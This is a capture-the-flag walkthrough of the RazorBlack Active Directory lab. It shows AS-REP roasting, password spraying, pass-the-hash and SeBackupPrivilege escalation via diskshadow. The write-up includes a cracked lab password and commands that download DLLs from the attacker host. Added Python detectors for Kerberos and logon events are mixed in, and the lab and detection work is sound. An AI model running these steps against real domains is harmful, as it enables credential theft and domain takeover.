RazorBlack

Information Gathering

sudo nmapAutomator.sh 10.10.87.225 all

This looks like a Domain Controller: Kerberos is listening on port 88, and LDAP is open as well.

Domain Name: raz0rblack.thm

Service Enumeration

SMB (Port 139/445)

Can't find anything here.

Port Mapper (Port 111)

sbradley.txt contains the first flag, while employee_status.xlsx contains the following:

Exploit

Notice that Steven Bradley appears in row 16 and the text file was named sbradley.txt, so the username convention is first initial plus surname (dport, iroyce, etc.). We can build a username list from the spreadsheet using that pattern.

We can then feed that list to Impacket's GetNPUsers.py, which requests a TGT for each user without Kerberos pre-authentication (AS-REP roasting). For any account that has pre-authentication disabled, the KDC replies with data encrypted under a key derived from the user's password, which we can hand to john to crack offline.

We get an AS-REP hash for the user twilliams, which we can crack with john.
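From the defender's side, the GetNPUsers.py run above leaves a distinctive trail in Kerberos TGT request events (4768): requests with pre-authentication type 0, and for roastable accounts a successful RC4-encrypted response. The following is an added example (not code from the original write-up) that scans constructed 4768 records for both the roastable account and the username-list run that found it. Field names follow the 4768 schema; the JSON-lines framing and all sample values are assumptions of this example.

```python
"""Detect AS-REP roasting from Kerberos TGT request (4768) telemetry.

Added example, not part of the original write-up. Field names follow the
Windows 4768 schema; the JSON-lines framing and the sample data are
assumptions made for this example.
"""
import json
from collections import defaultdict

# Constructed sample events (not real log data).
# PreAuthType 0 = no pre-authentication; TicketEncryptionType 0x17 = RC4-HMAC,
# 0x12 = AES256; Status 0x6 = KDC_ERR_C_PRINCIPAL_UNKNOWN (guessed name does
# not exist), 0x0 = ticket issued.
SAMPLE_EVENTS = """\
{"EventID": 4768, "TargetUserName": "twilliams", "IpAddress": "10.9.141.31", "PreAuthType": 0, "TicketEncryptionType": "0x17", "Status": "0x0"}
{"EventID": 4768, "TargetUserName": "dport", "IpAddress": "10.9.141.31", "PreAuthType": 0, "TicketEncryptionType": "0x17", "Status": "0x6"}
{"EventID": 4768, "TargetUserName": "iroyce", "IpAddress": "10.9.141.31", "PreAuthType": 0, "TicketEncryptionType": "0x17", "Status": "0x6"}
{"EventID": 4768, "TargetUserName": "sbradley", "IpAddress": "10.10.87.50", "PreAuthType": 2, "TicketEncryptionType": "0x12", "Status": "0x0"}
{"EventID": 4769, "TargetUserName": "sbradley", "IpAddress": "10.10.87.50", "PreAuthType": 2, "TicketEncryptionType": "0x12", "Status": "0x0"}
"""


def load_events(text):
    """Parse JSON-lines telemetry, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def find_asrep_roasting(events, enum_threshold=3):
    """Return (roasted, enumerating).

    roasted:     [(user, source_ip)] for TGTs issued with no pre-auth and
                 RC4 encryption, i.e. an AS-REP that can be cracked offline.
    enumerating: {source_ip: [users]} for sources that tried at least
                 enum_threshold distinct accounts without pre-authentication,
                 the signature of a username list being run through the KDC.
    """
    roasted = []
    no_preauth_users = defaultdict(set)
    for ev in events:
        if ev.get("EventID") != 4768 or ev.get("PreAuthType") != 0:
            continue
        no_preauth_users[ev["IpAddress"]].add(ev["TargetUserName"])
        if ev.get("Status") == "0x0" and ev.get("TicketEncryptionType") == "0x17":
            roasted.append((ev["TargetUserName"], ev["IpAddress"]))
    enumerating = {
        ip: sorted(users)
        for ip, users in no_preauth_users.items()
        if len(users) >= enum_threshold
    }
    return roasted, enumerating


if __name__ == "__main__":
    roasted, enumerating = find_asrep_roasting(load_events(SAMPLE_EVENTS))
    for user, ip in roasted:
        print(f"[!] AS-REP roastable account {user} served to {ip}")
    for ip, users in enumerating.items():
        print(f"[!] {ip} requested no-preauth TGTs for {len(users)} accounts: {', '.join(users)}")
```

The fix on the domain side is to clear "Do not require Kerberos preauthentication" on every account (the roastable one here is the only reason the attack works) and to prefer AES over RC4 ticket encryption, which turns the remaining no-preauth responses into far slower cracking targets.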

Looks like we got credentials.

twilliams:roastpotatoes

Using smbmap with these credentials, we see an interesting share, trash, but we don't have access to it. Since we do have access to the IPC$ share, we can brute-force usernames through it.

Let's filter the user list and see if anyone is new, i.e. not in the employee_status.xlsx file from earlier.

Let's spray the password roastpotatoes against all users to see if it is reused.

Notice that for the user sbradley the response says his password must be changed. Let's change it.
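The spray above is one password tried against every account from one source, and the "password must change" reply for sbradley is itself a tell: STATUS_PASSWORD_MUST_CHANGE (0xC0000224) is only returned after the supplied password has been verified, so from a spraying source it confirms a correct guess. As an added example (not code from the original write-up), the following scans constructed 4625/4624 logon records for that pattern. Field names follow the Windows logon event schema; the JSON-lines framing, the threshold and all sample values are assumptions of this example.

```python
"""Spot password spraying in Windows failed-logon telemetry.

Added example, not part of the original write-up. Field names follow the
4625/4624 schema; the JSON-lines framing and sample data are assumptions.
"""
import json
from collections import defaultdict

# Constructed sample events (not real log data). SubStatus 0xC000006A is
# "wrong password" and 0xC0000224 is "password must change" (password was
# correct). LogonType 3 = network logon, which is what SMB produces.
SAMPLE_EVENTS = """\
{"EventID": 4625, "TargetUserName": "dport", "IpAddress": "10.9.141.31", "LogonType": 3, "AuthenticationPackageName": "NTLM", "SubStatus": "0xC000006A"}
{"EventID": 4625, "TargetUserName": "iroyce", "IpAddress": "10.9.141.31", "LogonType": 3, "AuthenticationPackageName": "NTLM", "SubStatus": "0xC000006A"}
{"EventID": 4625, "TargetUserName": "lvetrova", "IpAddress": "10.9.141.31", "LogonType": 3, "AuthenticationPackageName": "NTLM", "SubStatus": "0xC000006A"}
{"EventID": 4625, "TargetUserName": "sbradley", "IpAddress": "10.9.141.31", "LogonType": 3, "AuthenticationPackageName": "NTLM", "SubStatus": "0xC0000224"}
{"EventID": 4624, "TargetUserName": "twilliams", "IpAddress": "10.9.141.31", "LogonType": 3, "AuthenticationPackageName": "NTLM"}
{"EventID": 4625, "TargetUserName": "lvetrova", "IpAddress": "10.10.87.50", "LogonType": 2, "AuthenticationPackageName": "Negotiate", "SubStatus": "0xC000006A"}
"""

PASSWORD_MUST_CHANGE = "0xC0000224"


def load_events(text):
    """Parse JSON-lines telemetry, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def find_password_spray(events, account_threshold=3):
    """Return {source_ip: summary} for sources whose failed logons span at
    least account_threshold distinct accounts.

    summary lists the accounts tried, the accounts where the password
    verified but must be changed (a successful guess in disguise), and the
    accounts the same source subsequently logged in as.
    """
    failed = defaultdict(set)
    must_change = defaultdict(set)
    succeeded = defaultdict(set)
    for ev in events:
        ip, user = ev.get("IpAddress"), ev.get("TargetUserName")
        if ev.get("EventID") == 4625:
            failed[ip].add(user)
            if ev.get("SubStatus") == PASSWORD_MUST_CHANGE:
                must_change[ip].add(user)
        elif ev.get("EventID") == 4624:
            succeeded[ip].add(user)
    findings = {}
    for ip, users in failed.items():
        if len(users) < account_threshold:
            continue  # a single user fat-fingering a password, not a spray
        findings[ip] = {
            "tried": sorted(users),
            "password_verified_must_change": sorted(must_change[ip]),
            "logged_in_as": sorted(succeeded[ip]),
        }
    return findings


if __name__ == "__main__":
    for ip, summary in find_password_spray(load_events(SAMPLE_EVENTS)).items():
        print(f"[!] spray from {ip}: tried {len(summary['tried'])} accounts")
        print(f"    verified-but-expired: {summary['password_verified_must_change']}")
        print(f"    logged in as:         {summary['logged_in_as']}")
```

Note that the per-account failure count stays at one for every user, which is why a lockout threshold alone never fires on a spray; the detection has to pivot on the source and count distinct accounts, and the must-change and success rows are what turn a noisy alert into a confirmed compromise.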

Great, it looks like we now have read permission on the trash share. Let's download all the files inside it.

Looks like the chat log contains useful information for privesc later.

We can then use zip2john to turn the zip file into a hash for john to crack.

Let's unzip the file and extract the hashes.

Next, we use cut to keep only the NT hash field (the fourth colon-separated column).

cut -d ':' -f 4 hashes.txt > ntlmhashes.txt

Then we delete the first four lines of the file in vim, since they aren't hashes.

Now that we are left with only NT hashes, we can try each one against lvetrova until one is accepted.

crackmapexec smb 10.10.46.129 -u lvetrova -H ntlmhashes.txt
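The dump being sliced above is a list of unsalted NT hashes, and that property is exactly what a defender should audit it for: two accounts with the same NT hash share the same password (which is what the spraying earlier relied on), and the well-known empty-password hash marks accounts with no password at all. The following is an added example, not code from the original write-up, that parses constructed secretsdump-style lines (the same `user:rid:lmhash:nthash:::` layout the cut command assumes, banner lines included) and runs those two checks. Every account name and hash in it is a placeholder.

```python
"""Audit a secretsdump-style NTDS dump for password reuse and blank passwords.

Added example, not part of the original write-up. The record layout is
the standard user:rid:lmhash:nthash::: format; accounts and hashes are
constructed placeholders.
"""
import re
from collections import defaultdict

# Well-known NT hash of the empty password (MD4 of the empty UTF-16LE string).
EMPTY_NT_HASH = "31d6cfe0d16ae931b73c59d7e0c089c0"

# One dump record: [domain\]user:rid:lmhash:nthash:::
RECORD_RE = re.compile(
    r"^(?P<user>[^:\s]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$",
    re.IGNORECASE,
)

# Constructed sample dump (placeholder hashes, made-up accounts). The bracketed
# lines mimic the tool banner that the write-up strips by hand.
SAMPLE_DUMP = """\
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
example.thm\\alice:1104:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
example.thm\\bob:1105:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
example.thm\\svc_backup:1106:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
[*] Cleaning up...
"""


def parse_dump(text):
    """Return [(user, rid, nt_hash)] for every well-formed record, skipping banners."""
    records = []
    for line in text.splitlines():
        m = RECORD_RE.match(line.strip())
        if m:
            records.append((m["user"], int(m["rid"]), m["nt"].lower()))
    return records


def nt_hashes(records):
    """The NT-hash column only, the same output as `cut -d ':' -f 4`."""
    return [nt for _, _, nt in records]


def find_shared_hashes(records):
    """{nt_hash: [users]} for hashes used by more than one account."""
    by_hash = defaultdict(list)
    for user, _, nt in records:
        by_hash[nt].append(user)
    return {nt: users for nt, users in by_hash.items() if len(users) > 1}


def find_blank_passwords(records):
    """Accounts whose NT hash is the empty-password hash."""
    return [user for user, _, nt in records if nt == EMPTY_NT_HASH]


if __name__ == "__main__":
    recs = parse_dump(SAMPLE_DUMP)
    for nt, users in find_shared_hashes(recs).items():
        print(f"[!] same password ({nt[:8]}...) on: {', '.join(users)}")
    for user in find_blank_passwords(recs):
        print(f"[!] blank password: {user}")
```

Because the regex only accepts complete records, the banner lines fall away on their own, which removes the need for the manual line deletion; a shared hash between a privileged account and a service account is the finding that matters most, since a pass-the-hash against either one then reaches both.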

With a working hash, we can use evil-winrm to get a shell.

In the user directory, we see an interesting XML file.

Next, we can use a pass-the-hash attack with lvetrova's credentials.

Let's use john again.

Same process as for lvetrova.

Privesc

We can abuse SeBackupPrivilege to escalate privileges. Take note that there is a space between each line of the diskshadow script.

Clone the following repo.

Upload the diskshadow.txt file.

Let's transfer the two DLL files next.

  1. Invoke-WebRequest http://10.9.141.31:80/home/kali/thm/razor/SeBackupPrivilege/SeBackupPrivilegeCmdLets/bin/Debug/SeBackupPrivilegeUtils.dll -OutFile C:\tmp\SeBackupPrivilegeUtils.dll

  2. Invoke-WebRequest http://10.9.141.31:80/home/kali/thm/razor/SeBackupPrivilege/SeBackupPrivilegeCmdLets/bin/Debug/SeBackupPrivilegeCmdLets.dll -OutFile C:\tmp\SeBackupPrivilegeCmdLets.dll

Great, now let's dump the hashes.

Then we pass the Administrator hash and get SYSTEM.
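The whole privesc chain rests on one account holding SeBackupPrivilege that had no business holding it, and on diskshadow being run by that account. Both facts are visible in standard telemetry: event 4672 lists the privileges granted at logon, and 4688 records process creation. As an added example (not code from the original write-up), the following audits constructed 4672/4688 records against an allowlist of accounts expected to hold backup rights. Field names follow the Windows schema; the JSON-lines framing, the allowlist contents and all sample values are assumptions of this example.

```python
"""Flag SeBackupPrivilege on unexpected accounts and diskshadow/ntds.dit use.

Added example, not part of the original write-up. Field names follow the
4672 and 4688 schemas; the JSON-lines framing, the allowlist and the
sample events are assumptions made for this example.
"""
import json

# Accounts expected to hold SeBackupPrivilege (assumed for this example; fill
# in from your own environment, e.g. the real backup service account).
BACKUP_ALLOWLIST = {"svc_backup"}

# Constructed sample events (not real log data). Raw string so the JSON keeps
# its doubled backslashes in Windows paths.
SAMPLE_EVENTS = r"""
{"EventID": 4672, "SubjectUserName": "svc_backup", "SubjectLogonId": "0x1a2b", "PrivilegeList": "SeBackupPrivilege SeRestorePrivilege"}
{"EventID": 4672, "SubjectUserName": "jdoe", "SubjectLogonId": "0x3c4d", "PrivilegeList": "SeBackupPrivilege SeRestorePrivilege SeShutdownPrivilege"}
{"EventID": 4688, "SubjectUserName": "jdoe", "SubjectLogonId": "0x3c4d", "NewProcessName": "C:\\Windows\\System32\\diskshadow.exe", "CommandLine": "diskshadow.exe /s C:\\tmp\\diskshadow.txt"}
{"EventID": 4688, "SubjectUserName": "jdoe", "SubjectLogonId": "0x3c4d", "NewProcessName": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe /c copy E:\\Windows\\NTDS\\ntds.dit C:\\tmp\\ntds.dit"}
{"EventID": 4688, "SubjectUserName": "svc_backup", "SubjectLogonId": "0x1a2b", "NewProcessName": "C:\\Windows\\System32\\diskshadow.exe", "CommandLine": "diskshadow.exe /s C:\\backup\\nightly.txt"}
"""


def load_events(text):
    """Parse JSON-lines telemetry, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def audit_backup_privilege(events, allowlist=BACKUP_ALLOWLIST):
    """Return [(severity, account, detail)] findings.

    medium: SeBackupPrivilege granted at logon to an account outside the allowlist
    high:   diskshadow.exe started by such an account, or any process whose
            command line touches ntds.dit (the AD database only backups should read)
    """
    findings = []
    for ev in events:
        user = ev.get("SubjectUserName", "")
        if ev.get("EventID") == 4672:
            privs = ev.get("PrivilegeList", "").split()
            if "SeBackupPrivilege" in privs and user not in allowlist:
                findings.append(("medium", user, "SeBackupPrivilege assigned to non-backup account"))
        elif ev.get("EventID") == 4688:
            exe = ev.get("NewProcessName", "").lower()
            cmd = ev.get("CommandLine", "")
            if exe.endswith("\\diskshadow.exe") and user not in allowlist:
                findings.append(("high", user, "diskshadow outside backup accounts: " + cmd))
            if "ntds.dit" in cmd.lower():
                findings.append(("high", user, "command line references ntds.dit: " + cmd))
    return findings


if __name__ == "__main__":
    for severity, account, detail in audit_backup_privilege(load_events(SAMPLE_EVENTS)):
        print(f"[{severity}] {account}: {detail}")
```

The 4672 check is the cheap, preventive one: it surfaces Backup Operators membership (or an equivalent right) on ordinary user accounts before anyone uses it, so the fix is to prune that group; the 4688 checks are the after-the-fact confirmation that the right was exercised against the domain database.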

Use the Magic operation in CyberChef to decode the flag.
